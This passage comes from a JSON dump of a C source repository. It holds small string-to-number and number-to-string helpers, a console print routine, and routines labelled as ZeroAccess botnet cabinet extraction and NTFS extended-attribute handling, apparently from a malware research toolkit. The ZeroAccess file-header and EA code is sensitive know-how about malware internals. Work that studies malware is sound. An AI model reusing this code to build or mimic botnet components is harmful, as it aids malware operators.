strtoi_a\n#define strtoi64 strtoi64_a\n#define strtou64 strtou64_a\n#define hextou64 hextou64_a\n\n#endif\n\n#endif /* _MINIRTL_ */\n"
},
{
"path": "Source/minirtl/rtltypes.h",
"content": "#ifndef _WCHAR_T_DEFINED\ntypedef unsigned short wchar_t;\n#define _WCHAR_T_DEFINED\n#endif /* _WCHAR_T_DEFINED */\n\n#ifndef _SIZE_T_DEFINED\n#ifdef _WIN64\ntypedef unsigned __int64 size_t;\n#else /* _WIN64 */\ntypedef __w64 unsigned int size_t;\n#endif /* _WIN64 */\n#define _SIZE_T_DEFINED\n#endif /* _SIZE_T_DEFINED */\n\n__forceinline char locase_a(char c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline wchar_t locase_w(wchar_t c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline char byteabs(char x) {\n\tif (x < 0)\n\t\treturn -x;\n\treturn x;\n}\n\n__forceinline int _isdigit_a(char x) {\n\treturn ((x >= '0') && (x <= '9'));\n}\n\n__forceinline int _isdigit_w(wchar_t x) {\n\treturn ((x >= L'0') && (x <= L'9'));\n}\n"
},
{
"path": "Source/minirtl/strtoi.c",
"content": "#include \"rtltypes.h\"\n\nint strtoi_a(char *s)\n{\n\tint\t\ta = 0, sign;\n\tchar\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase '-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase '+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10) + (c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n\nint strtoi_w(wchar_t *s)\n{\n\tint\t\t\ta = 0, sign;\n\twchar_t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase L'-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase L'+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n"
},
{
"path": "Source/minirtl/strtoi64.c",
"content": "#include \"rtltypes.h\"\n\nsigned long long strtoi64_a(char *s)\n{\n\tsigned long long\ta = 0, sign;\n\tchar\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase '-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase '+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10) + (c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n\nsigned long long strtoi64_w(wchar_t *s)\n{\n\tsigned long long\ta = 0, sign;\n\twchar_t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase L'-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase L'+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n"
},
{
"path": "Source/minirtl/strtou64.c",
"content": "#include \"rtltypes.h\"\n\nunsigned long long strtou64_a(char *s)\n{\n\tunsigned long long \ta = 0;\n\tchar\t\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n\nunsigned long long strtou64_w(wchar_t *s)\n{\n\tunsigned long long \ta = 0;\n\twchar_t\t\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n"
},
{
"path": "Source/minirtl/strtoul.c",
"content": "#include \"rtltypes.h\"\n\n#define ULONG_MAX_VALUE 0xffffffffUL\n\nunsigned long strtoul_a(char *s)\n{\n unsigned long long a = 0;\n char c;\n\n if (s == 0)\n return 0;\n\n while (*s != 0) {\n c = *s;\n if (_isdigit_a(c))\n a = (a*10)+(c-'0');\n else\n break;\n\n if (a > ULONG_MAX_VALUE)\n return ULONG_MAX_VALUE;\n\n s++;\n }\n return (unsigned long)a;\n}\n\nunsigned long strtoul_w(wchar_t *s)\n{\n unsigned long long\ta = 0;\n wchar_t\t\t\tc;\n\n if (s == 0)\n return 0;\n\n while (*s != 0) {\n c = *s;\n if (_isdigit_w(c))\n a = (a * 10) + (c - L'0');\n else\n break;\n\n if (a > ULONG_MAX_VALUE)\n return ULONG_MAX_VALUE;\n\n s++;\n }\n return (unsigned long)a;\n}\n"
},
{
"path": "Source/minirtl/u64tohex.c",
"content": "#include \"rtltypes.h\"\n\nsize_t u64tohex_a(unsigned long long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c=0; c<16; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n\nsize_t u64tohex_w(unsigned long long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c = 0; c<16; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n"
},
{
"path": "Source/minirtl/u64tostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t u64tostr_a(unsigned long long x, char *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t u64tostr_w(unsigned long long x, wchar_t *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
},
{
"path": "Source/minirtl/ultohex.c",
"content": "#include \"rtltypes.h\"\n\nsize_t ultohex_a(unsigned long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n\nsize_t ultohex_w(unsigned long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n"
},
{
"path": "Source/minirtl/ultostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t ultostr_a(unsigned long x, char *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t ultostr_w(unsigned long x, wchar_t *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
},
{
"path": "Source/shared/cab.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: CAB.C\n*\n* VERSION: 1.00\n*\n* DATE: 18 Jan 2016\n*\n* ZeroAccess cabinet extraction from memory buffer.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"cab.h\"\n\n#pragma comment(lib, \"cabinet.lib\")\nstatic CABDATA g_CabParam;\n\n/*\n* fdiAlloc\n*\n* Purpose:\n*\n* Callback function to allocate memory.\n*\n*/\nvoid* DIAMONDAPI fdiAlloc(\n\tULONG cb\n\t)\n{\n\treturn LocalAlloc(LPTR, cb);\n}\n\n/*\n* fdiFree\n*\n* Purpose:\n*\n* Callback function to free previously allocated memory.\n*\n*/\nvoid DIAMONDAPI fdiFree(\n\tvoid HUGE *pv\n\t)\n{\n\tif (pv) {\n\t\tLocalFree(pv);\n\t}\n}\n\n/*\n* fdiClose\n*\n* Purpose:\n*\n* Callback function to release memory allocated for file memory stream.\n*\n*/\nint DIAMONDAPI fdiClose(\n\tCABDATA *hf\n\t)\n{\n\tLocalFree((HLOCAL)hf);\n\treturn 0;\n}\n\n/*\n* fdiOpen\n*\n* Purpose:\n*\n* Callback function to create a memory stream.\n*\n*/\nINT_PTR DIAMONDAPI fdiOpen(\n\tLPSTR pszFile,\n\tint oflag,\n\tint pmode\n\t)\n{\n\tCABDATA *Data = NULL;\n\tCABDATA *param;\n\t\n\tULONG_PTR value;\n\n\tUNREFERENCED_PARAMETER(oflag);\n\tUNREFERENCED_PARAMETER(pmode);\n\n#ifdef _WIN64\n\tvalue = strtou64_a(pszFile);\n#else\n\tvalue = strtoul_a(pszFile);\n#endif\n\tparam = (CABDATA *)value;\n\n\tData = (CABDATA*)LocalAlloc(LPTR, sizeof(CABDATA));\n\tif (Data) {\n\t\tData->Buffer = param->Buffer;\n\t\tData->Size = param->Size;\n\t\tData->Offset = 0;\n\t}\n\treturn (INT_PTR)Data;\n}\n\n/*\n* fdiRead\n*\n* Purpose:\n*\n* Callback function to read from memory stream.\n*\n*/\nUINT DIAMONDAPI fdiRead(\n\tCABDATA *Data,\n\tvoid FAR *pv,\n\tUINT cb\n\t)\n{\n\tUINT bytesToRead = cb;\n\t\n\tif (cb >= (UINT)(Data->Size - Data->Offset))\n\t\tbytesToRead = Data->Size - Data->Offset;\n\n\tmemcpy(pv, &Data->Buffer[Data->Offset], bytesToRead);\n\tData->Offset += bytesToRead;\n\treturn bytesToRead;\n}\n\n/*\n* fdiWrite\n*\n* Purpose:\n*\n* Callback function to write to the memory stream.\n*\n*/\nUINT fdiWrite(\n\tCABDATA *Data,\n\tvoid FAR *pv,\n\tUINT cb\n\t)\n{\n\tif ((LONG)(Data->Offset + cb) <= Data->Size) {\n\t\tmemcpy(&Data->Buffer[Data->Offset], pv, cb);\n\t\tData->Offset += cb;\n\t}\n\telse {\n\t\treturn 0;\n\t}\n\treturn cb;\n}\n\n/*\n* fdiSeek\n*\n* Purpose:\n*\n* Callback function to seek in memory stream.\n*\n*/\nlong fdiSeek(\n\tCABDATA *Data,\n\tlong dist,\n\tint seektype\n\t)\n{\n\tLONG pos = 0;\n\n\tif (seektype) {\n\t\tif (seektype != SEEK_CUR) {\n\t\t\treturn -1;\n\t\t}\n\t\tpos = dist + Data->Offset;\n\t}\n\telse\n\t{\n\t\tpos = dist;\n\t}\n\tif (pos > Data->Size)\n\t\treturn -1;\n\n\tData->Offset = pos;\n\treturn pos;\n}\n\n/*\n* fdiNotify\n*\n* Purpose:\n*\n* Callback notification function to update the application on the status of the decoder.\n*\n*/\nINT_PTR DIAMONDAPI fdiNotify(FDINOTIFICATIONTYPE fdint, PFDINOTIFICATION pfdin)\n{\n\tINT_PTR Result = 0;\n\tCABDATA *Data, *ReturnData = NULL;\n\tLPSTR LookupFileName;\n\tLONG Size;\n\n\tswitch (fdint) {\n\n\tcase fdintCOPY_FILE:\n\n\t\tif (pfdin->pv == NULL)\n\t\t\tbreak;\n\n\t\tData = (CABDATA *)pfdin->pv;\n\t\tLookupFileName = (LPSTR)&Data->Size;\n\t\tSize = pfdin->cb;\n\t\tif (_strcmpi_a(LookupFileName, pfdin->psz1) == 0) {\n\t\t\tReturnData = LocalAlloc(LPTR, sizeof(CABDATA));\n\t\t\tif (ReturnData) {\n\t\t\t\tReturnData->Buffer = LocalAlloc(LPTR, pfdin->cb);\n\t\t\t\tif (ReturnData->Buffer == NULL) {\n\t\t\t\t\tLocalFree(ReturnData);\n\t\t\t\t\tReturnData = NULL;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tReturnData->Offset = 0;\n\t\t\t\t\tReturnData->Size = pfdin->cb;\n\t\t\t\t\tData->Buffer = ReturnData->Buffer;\n\t\t\t\t\tData->Size = ReturnData->Size;\n\t\t\t\t}\n\t\t\t\treturn (INT_PTR)ReturnData;\n\t\t\t}\n\t\t}\n\t\tbreak;\n\n\tcase fdintCLOSE_FILE_INFO: //release ReturnedInfo\n\t\tLocalFree((HLOCAL)pfdin->hf);\n\t\tResult = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tbreak;\n\n\t}\n\treturn Result;\n}\n\n/*\n* SfcabExtractMemory\n*\n* Purpose:\n*\n* Process cabinet file in memory and extract it contents.\n*\n* On success returned buffer must be deallocated with LocalFree after usage.\n*\n*/\nPVOID SfcabExtractMemory(\n\tPVOID CabPtr,\n\tULONG CabSize,\n\tPULONG ExtractedBytes\n\t)\n{\n\n\tHFDI hfdi;\n\tERF erf;\n\tCHAR text[32];\n\tCHAR name[1];\n\tPVOID Buffer = NULL;\n\tCABDATA Data;\n\t\n\tif (ExtractedBytes == NULL)\n\t\treturn NULL;\n\n\t__try {\n\n\t\tRtlSecureZeroMemory(&erf, sizeof(ERF));\n\t\thfdi = FDICreate((PFNALLOC)fdiAlloc, (PFNFREE)fdiFree, (PFNOPEN)fdiOpen, (PFNREAD)fdiRead,\n\t\t\t(PFNWRITE)fdiWrite, (PFNCLOSE)fdiClose, (PFNSEEK)fdiSeek, cpu80386, &erf);\n\n\t\tif (hfdi) {\n\n\t\t\tg_CabParam.Buffer = CabPtr;\n\t\t\tg_CabParam.Size = CabSize;\n\t\t\tg_CabParam.Offset = 0;\n\n\t\t\tRtlSecureZeroMemory(&text, sizeof(text));\n#ifdef _WIN64\n\t\t\tu64tostr_a((ULONG_PTR)&g_CabParam, text);\n#else \n\t\t\tultostr_a((ULONG_PTR)&g_CabParam, text);\n#endif\n\n\t\t\tname[0] = 0;\n\n\t\t\tData.Size = '_';\n\t\t\tData.Buffer = NULL;\n\t\t\tData.Offset = 0;\n\t\t\tif (FDICopy(hfdi, name, text, 0, fdiNotify, 0, &Data)) {\n\t\t\t\tBuffer = Data.Buffer;\n\t\t\t\t*ExtractedBytes = Data.Size;\n\t\t\t}\n\t\t\tFDIDestroy(hfdi);\n\t\t}\n\t}\n\t__except (EXCEPTION_EXECUTE_HANDLER)\n\t{\n\t\treturn NULL;\n\t}\n\treturn Buffer;\n}\n"
},
{
"path": "Source/shared/cab.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: CAB.H\n*\n* VERSION: 1.01\n*\n* DATE: 18 Jan 2016\n*\n* Common header file for ZeroAccess cabinet extraction support.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include \n\ntypedef struct _CABDATA {\n\tLONG Size;\n\tPUCHAR Buffer;\n\tLONG Offset;\n} CABDATA, *PCABDATA;\n\nPVOID SfcabExtractMemory(\n\tPVOID CabPtr,\n\tULONG CabSize,\n\tPULONG ExtractedBytes\n\t);\n"
},
{
"path": "Source/shared/cui.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: CUI.C\n*\n* VERSION: 1.02\n*\n* DATE: 01 Dec 2017\n*\n* Console output.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n/*\n* SfcuiPrintText\n*\n* Purpose:\n*\n* Output text to the console or file.\n*\n*/\nVOID SfcuiPrintText(\n _In_ HANDLE hOutConsole,\n _In_ LPWSTR lpText,\n _In_ BOOL ConsoleOutputEnabled,\n _In_ BOOL UseReturn\n)\n{\n SIZE_T consoleIO;\n DWORD bytesIO;\n LPWSTR Buffer;\n\n if (lpText == NULL)\n return;\n\n consoleIO = _strlen(lpText);\n if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))\n return;\n\n consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);\n Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);\n if (Buffer) {\n\n _strcpy(Buffer, lpText);\n if (UseReturn) _strcat(Buffer, TEXT(\"\\r\\n\"));\n\n consoleIO = _strlen(Buffer);\n\n if (ConsoleOutputEnabled != FALSE) {\n WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n }\n else {\n WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);\n }\n RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);\n }\n}\n"
},
{
"path": "Source/shared/cui.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: CUI.H\n*\n* VERSION: 1.01\n*\n* DATE: 18 Jan 2016\n*\n* Common header file for console ui.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#include \"global.h\"\n\nVOID SfcuiPrintText(\n\t_In_ HANDLE hOutConsole,\n\t_In_ LPWSTR lpText,\n\t_In_ BOOL ConsoleOutputEnabled,\n\t_In_ BOOL UseReturn\n\t);\n"
},
{
"path": "Source/shared/ea.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2006 - 2016\n*\n* TITLE: EA.C\n*\n* VERSION: 1.00\n*\n* DATE: 15 Jan 2016\n*\n* ZeroAccess EA support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"ea.h\"\n\n//NextOffset 0, EaNameLength 3, EaName VER\nBYTE g_ZaFileEa[] = { 0x00, 0x00, 0x00, 0x00, 0x03, 0x56, 0x45, 0x52, 0x00 };\n\n/*\n* SfNtfsQueryFileHeaderFromEa\n*\n* Purpose:\n*\n* Read ZA_FILEHEADER, required for file verification, from file.\n*\n*/\nBOOL SfNtfsQueryFileHeaderFromEa(\n\t_In_ HANDLE hFile,\n\t_Inout_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tBOOL bResult;\n\tNTSTATUS status;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tFILE_FULL_EA_INFORMATION *EaFullInfo;\n\tFILE_GET_EA_INFORMATION *EaGetInfo;\n\tBYTE Buffer[ZA_EASIZE];\n\n\tRtlSecureZeroMemory(Buffer, sizeof(Buffer));\n\tEaFullInfo = (FILE_FULL_EA_INFORMATION *)&Buffer;\n\tEaGetInfo = (FILE_GET_EA_INFORMATION *)&g_ZaFileEa;\n\n\tstatus = NtQueryEaFile(hFile, &IoStatusBlock, EaFullInfo, ZA_EASIZE,\n\t\tFALSE, EaGetInfo, sizeof(g_ZaFileEa), NULL, FALSE);\n\n\tif ((!NT_SUCCESS(status)) || (EaFullInfo->EaValueLength != sizeof(ZA_FILEHEADER))) {\n\t\tbResult = FALSE;\n\t}\n\telse {\n\t\tRtlCopyMemory(FileHeader, (LPBYTE)(EaFullInfo->EaName + EaFullInfo->EaNameLength + 1), sizeof(ZA_FILEHEADER));\n\t\tbResult = TRUE;\n\t}\n\treturn bResult;\n}\n\n/*\n* SfNtfsSetFileHeaderToEa\n*\n* Purpose:\n*\n* Write ZA_FILEHEADER, required for file verification, to file.\n*\n*/\nBOOL SfNtfsSetFileHeaderToEa(\n\t_In_ HANDLE hFile,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tNTSTATUS status;\n\tFILE_FULL_EA_INFORMATION *EaFullInfo;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tBYTE Buffer[ZA_EASIZE];//152\n\n\tRtlSecureZeroMemory(Buffer, sizeof(Buffer));\n\tEaFullInfo = (FILE_FULL_EA_INFORMATION*)&Buffer;\n\n\tEaFullInfo->Flags = 0;\n\t_strcpy_a(EaFullInfo->EaName, \"VER\");\n\tEaFullInfo->EaNameLength = 3;\n\tEaFullInfo->EaValueLength = sizeof(ZA_FILEHEADER);\n\tEaFullInfo->NextEntryOffset = 0;\n\n\tRtlCopyMemory((LPBYTE)(EaFullInfo->EaName + EaFullInfo->EaNameLength + 1),\n\t\tFileHeader, sizeof(ZA_FILEHEADER));\n\n\tstatus = NtSetEaFile(hFile, &IoStatusBlock, EaFullInfo, ZA_EASIZE);\n\treturn (NT_SUCCESS(status));\n}\n\n//test ea data\nunsigned char zaea[140] = {\n\t0x01, 0x00, 0x00, 0x00, 0x7A, 0x73, 0xB0, 0x43, 0x00, 0x06, 0x00, 0x00, 0x44, 0xAC, 0x09, 0xAA,\n\t0x99, 0xF3, 0x29, 0xA3, 0x21, 0xB2, 0xE7, 0x5C, 0x46, 0x43, 0xA4, 0xDE, 0x51, 0x8C, 0xE8, 0x35,\n\t0x64, 0x66, 0x70, 0x49, 0xFE, 0xF7, 0x86, 0xC4, 0xC5, 0x56, 0x6E, 0x20, 0xC0, 0x16, 0x27, 0xB5,\n\t0xFB, 0x4D, 0x17, 0x66, 0xA2, 0x86, 0x44, 0x4A, 0x36, 0x21, 0x32, 0x18, 0x5D, 0x9E, 0x6D, 0x32,\n\t0x61, 0x20, 0xA7, 0xE7, 0x6D, 0x04, 0x00, 0x9F, 0xC5, 0xBD, 0x8E, 0xFA, 0xFC, 0xB7, 0xD7, 0x14,\n\t0x81, 0x00, 0xDA, 0xDB, 0xCB, 0x36, 0x17, 0xCE, 0x84, 0x0D, 0x53, 0x46, 0x88, 0xEF, 0x1E, 0xC0,\n\t0xF8, 0xF0, 0xDF, 0xC1, 0x15, 0x12, 0x25, 0x63, 0x04, 0x40, 0x0A, 0x00, 0x7A, 0x88, 0x93, 0x99,\n\t0xC5, 0x1E, 0x52, 0x41, 0xE5, 0x18, 0xCB, 0x11, 0xA3, 0x73, 0xD0, 0xA2, 0xA3, 0x30, 0xD0, 0x47,\n\t0x2F, 0x0F, 0x18, 0xD5, 0x03, 0x30, 0xDD, 0xC2, 0xCB, 0x3D, 0x96, 0x34\n};\n\nNTSTATUS SfNtfsDumpFileEa(\n\t_In_opt_ HANDLE RootDirectory,\n\t_In_ LPWSTR FileName\n\t)\n{\n\tNTSTATUS status;\n\tHANDLE hFile;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tZA_FILEHEADER FileHeader;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tUNICODE_STRING uFileName;\n\n\tRtlSecureZeroMemory(&uFileName, sizeof(uFileName));\n\tRtlInitUnicodeString(&uFileName, FileName);\n\tInitializeObjectAttributes(&ObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, RootDirectory, NULL);\n\n\tstatus = NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, &IoStatusBlock,\n\t\tFILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, \n\t\tFILE_SYNCHRONOUS_IO_NONALERT);\n\n\tif (!NT_SUCCESS(status))\n\t\treturn status;\n\n\tRtlSecureZeroMemory(&FileHeader, sizeof(FileHeader));\n\tif (SfNtfsQueryFileHeaderFromEa(hFile, &FileHeader)) {\n\t\tSfuWriteBufferToFile(L\"outEa.bin\", &FileHeader, sizeof(FileHeader), FALSE, FALSE);\n\t}\n\tNtClose(hFile);\n\treturn STATUS_SUCCESS;\n}\n\nBOOL TestEa(\n\tBOOL TestSet\n\t)\n{\n\tUNICODE_STRING usName;\n\tNTSTATUS status;\n\tHANDLE hFile = NULL;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tBOOL bResult = FALSE, cond = FALSE;\n\tZA_BOT_PATH zaBotPath;\n\n\tRtlSecureZeroMemory(&usName, sizeof(usName));\n\tRtlSecureZeroMemory(&zaBotPath, sizeof(zaBotPath));\n\tSfuBuildBotPath(&zaBotPath);\n\n\tdo {\n\n\t\tRtlInitUnicodeString(&usName, L\"00000001.@\");\n\t\tInitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n\t\tif (TestSet) {\n\t\t\tstatus = NtCreateFile(&hFile, FILE_GENERIC_WRITE, &ObjectAttributes, &IoStatusBlock, NULL, 0,\n\t\t\t\t0, FILE_OPEN,\n\t\t\t\tFILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\n\t\t\tbResult = SfNtfsSetFileHeaderToEa(hFile, (ZA_FILEHEADER *)&zaea);\n\n\t\t\tNtClose(hFile);\n\t\t}\n\t\telse {\n\t\t\tbResult = SfNtfsDumpFileEa(NULL, L\"out.bin\");\n\t\t}\n\n\t} while (cond);\n\n\n\treturn bResult;\n}\n"
},
{
"path": "Source/shared/ea.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: EA.H\n*\n* VERSION: 1.01\n*\n* DATE: 19 Jan 2016\n*\n* ZeroAccess EA support routines header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#define ZA_EASIZE sizeof(FILE_FULL_EA_INFORMATION) + sizeof(ZA_FILEHEADER) //152 bytes\n\nBOOL SfNtfsQueryFileHeaderFromEa(\n\t_In_ HANDLE hFile,\n\t_Inout_ ZA_FILEHEADER *FileHeader\n\t);\n\nBOOL SfNtfsSetFileHeaderToEa(\n\t_In_ HANDLE hFile,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t);\n"
},
{
"path": "Source/shared/gdip.c",
